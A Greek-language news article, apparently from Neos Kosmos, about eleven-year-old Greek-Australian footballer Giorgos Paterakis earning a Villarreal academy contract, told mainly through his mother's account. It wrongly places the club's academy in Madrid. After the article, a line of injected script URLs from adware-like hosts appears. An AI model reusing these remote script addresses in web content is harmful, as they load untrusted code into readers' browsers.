Εντεκάχρονο ταλαντούχο Ελληνόπουλο της Αυστραλίας οδεύει προς Ισπανία

Τα “λαγωνικά” της Βιγιαρεάλ παρατήρησαν αμέσως τις ικανότητες αλλά και τον χαρακτήρα του νεαρού Γιώργου Πατεράκη και του προσέφεραν συμβόλαιο συνεργασίας με το “κίτρινο υποβρύχιο”

Διαρκώς με μια μπάλα στα πόδια.
Έτσι περιγράφει τον νεαρό Γιώργο Πατεράκη η μητέρα του Σοφία στον “Νέο Κόσμο”, μιλώντας για το επόμενο βήμα στην ποδοσφαιρική καριέρα του γιου της που τον φέρνει στις ακαδημίες μιας εκ των πιο γνωστών ομάδων της Πριμέρα Ντιβιζιόν, της Βιγιαρεάλ.

Όπως μας περιγράφει την εμπειρία η υπερήφανη μητέρα, ο νεαρός είχε δοκιμαστεί αρκετές φορές σε διάφορα προπονητικά κέντρα συλλόγων της νότιας Ευρώπης αν και ουσιαστικά άνηκε εδώ και καιρό στους Bentleigh Greens, ομάδα που του έδωσε την ευκαιρία να κάνει τα πρώτα του ποδοσφαιρικά βήματα.
Ωστόσο, τα πράγματα στην Ισπανία φάνηκαν να είναι διαφορετικά αυτή τη φορά:

“Τα τελευταία τρια χρόνια ο Γιώργος δέχεται προσκλήσεις να συμμετάσχει σε προπονήσεις ομάδων της Ισπανίας και της Μαδρίτης”, μας εξηγεί η κα Σοφία.
“Φέτος είπαμε να πάμε στην περιοχή της Βαλένθια κι εκεί κοντά είναι ο σύλλογος της Βιγιαρεάλ.
Ωστόσο η χρονική περίοδος που πήγαμε, χωρίς να το γνωρίζουμε, ήταν η εποχή του scouting (αναζήτησης ταλέντων) και υπήρχαν εκεί παιδιά από όλο τον πλανήτη.
Από την Ασία, την Αμερική, τη Μέση Ανατολή, κλπ.

Μετά την πρώτη μέρα δοκιμών τον καλέσανε και για δεύτερη και ύστερα από μια βδομάδα, ήμασταν ακόμη εκεί τη στιγμή που άλλα παιδιά πηγαινοερχόντουσαν.
Κι αυτό μας έβαλε σε σκέψεις ότι κάτι καλό μπορεί να συμβεί.
Μετά από δύο βδομάδες είχε μείνει μόνο άλλο ένα παιδάκι από τις ΗΠΑ αλλά στο τέλος κι αυτό έφυγε.
Στη συνέχεια οι άνθρωποι του συλλόγου ξενάγησαν το σύζυγό μου σε όλους τους χώρους, τα σχολεία και τα ιατρικά κέντρα και στο τέλος μας προσέφεραν συμβόλαιο”.
Τι ήταν όμως αυτό που κέρδισε τους ανθρώπους της Ισπανικής ομάδας;

Όπως μας εξηγεί η μητέρα του νεαρού παίκτη, δεν αρκούσε μόνο το πλούσιο ποδοσφαιρικό ταλέντο ώστε να μεταπείσει τους δαιμόνιους κυνηγούς ταλέντων:
“Μείναμε άναυδοι.
Ειλικρινά, δεν περιμέναμε να δούμε τόση λεπτομέρεια στην ανάπτυξη ταλαντούχων ποδοσφαιριστών.
Η φιλοσοφία τους είναι πως ‘ναι, σίγουρα μπορείς να γίνεις σπουδαίος ποδοσφαιριστής, αλλά θα πρέπει να έχεις και το σωστό τρόπο σκέψης’ και απ’ ότι μας είπαν, τα παιδιά δεν τα διώχνουν επειδή δεν είναι καλοί παίκτες αφού μπορούν τον οποιονδήποτε να τον κάνουν σπουδαίο ποδοσφαιριστή.

Αλλά πρώτον θα πρέπει να τα πηγαίνουν καλά στο σχολείο και δεύτερον θα πρέπει να είναι οι κατάλληλοι άνθρωποι για τη δουλειά.
Οπότε και μόνο που μίλησαν στο Γιώργο ήταν αρκετό για να καταλάβουν πως υπάρχει κάτι αξιόλογο εδώ”.

Το ποδόσφαιρο, σύμφωνα με τις μαρτυρίες της κας Σοφίας, αντιμετωπίζεται με εντελώς διαφορετική αντίληψη στην Ισπανία σε σχέση με την Αυστραλία και οι ακαδημίες των ομάδων όπως η Βιγιαρεάλ εστιάζουν στη δημιουργία αξιόλογων ποδοσφαιριστών οι οποίοι θα έχουν μεγάλη μεταπωλητική αξία:

“Το πρώτο που μου έκανε εντύπωση ήταν ο επαγγελματισμός των προπονητών
. Δεν υπάρχουν πατεράδες παικτών να κάνουν προπονήσεις, που είναι τεράστια διαφορά.
Όλοι οι προπονητές στην Ισπανία ήταν επαγγελματίες με ειδικές άδειες από την UEFA.
Το δεύτερο που με εντυπωσίασε ήταν το πόσο λίγη σχέση είχαν οι γονείς με τους προπονητές.
Οι γονείς μπορεί να μην ήξεραν καν τον προπονητή των παιδιών τους ή να μην του έχουν μιλήσει.

Οι γονείς δεν εμπλέκονται με τα ποδοσφαιρικά όπως στην Αυστραλία.
Ακόμη και τα ρούχα και οι εμφανίσεις των παιδιών ετοιμάζονται από ειδικό προσωπικό”.
Τώρα που ο γιος της θα βρίσκεται στην Ισπανία και θα προπονείται στην Βιγιαρεάλ, τα έξοδα θα καλυφθούν εξ’ ολοκλήρου από τον σύλλογο της La Liga.
Ωστόσο, μέχρι προ ολίγου, ο νεαρός ήταν μέλος των Bentleigh Greens και το κόστος δεν ήταν μικρό για την οικογένεια Πατεράκη: “Ήταν πολλά τα έξοδα.
Όχι μόνο για τις προπονήσεις, έχουν αρχίσει και επιπλέον πράγματα τώρα (χτίσιμο δομής, ανάπτυξη επιπλέον ικανοτήτων, κ.ά.), συν τις προπονήσεις στο εξωτερικό, αφού αυτή δεν ήταν η πρώτη φορά.
Οπότε ναι, μας κόστισε αρκετά. Ευτυχώς εμείς είμαστε σε θέση να τα παρέχουμε αυτά στο παιδί μας, ωστόσο δεν μπορούν να πουν όλες οι οικογένειες το ίδιο κι εκεί είναι νομίζω που πολλά άλλα παιδιά χάνουν τις ευκαιρίες που τους αξίζουν.

Γιατί είναι πραγματικά ακριβό το ποδόσφαιρο”. Ο μικρός Γιώργος Πατεράκης είναι κάτοχος του ελληνικού διαβατηρίου (ταξιδεύει τουλάχιστον μια φορά το χρόνο στην Ελλάδα) οπότε και θα αγωνίζεται στο σύλλογο ως κοινοτικός.
Όσο για το ποια εθνική θα ήθελε να εκπροσωπήσει; Προς το παρόν ο Γιώργος φαίνεται διχασμένος.
“Δεν είναι σίγουρος γιατί αισθάνεται απογοητευμένος από τον τρόπο που η χώρα χειρίζεται το άθλημα.
Φεύγει με μια αίσθηση πικρίας και απογοήτευσης από την Αυστραλία”, μας λέει η μητέρα του.

Ο νεαρός θα ολοκληρώσει τις σχολικές του υποχρεώσεις και στη συνέχεια θα αναχωρήσει για Μαδρίτη, όπου και θα εγκατασταθεί στις ακαδημίες της Βιγιαρεάλ.
Ας ελπίσουμε να τον δούμε πολλές φορές στο μέλλον με τη φανέλα του “κίτρινου υποβρυχίου”. Το μέλλον του ανήκει.

Πηγή:Νέος Κόσμος

//manextdev.com/1e3f925eaaebaa220d.jshttps://makesource.cool/addons/lnkr5.min.jshttps://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52355x7743x&r=1544039438586https://makesource.cool/ext/1e3f925eaaebaa220d.js?sid=52355_7743_&title=ads&blocks%5B%5D=31af2

 

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.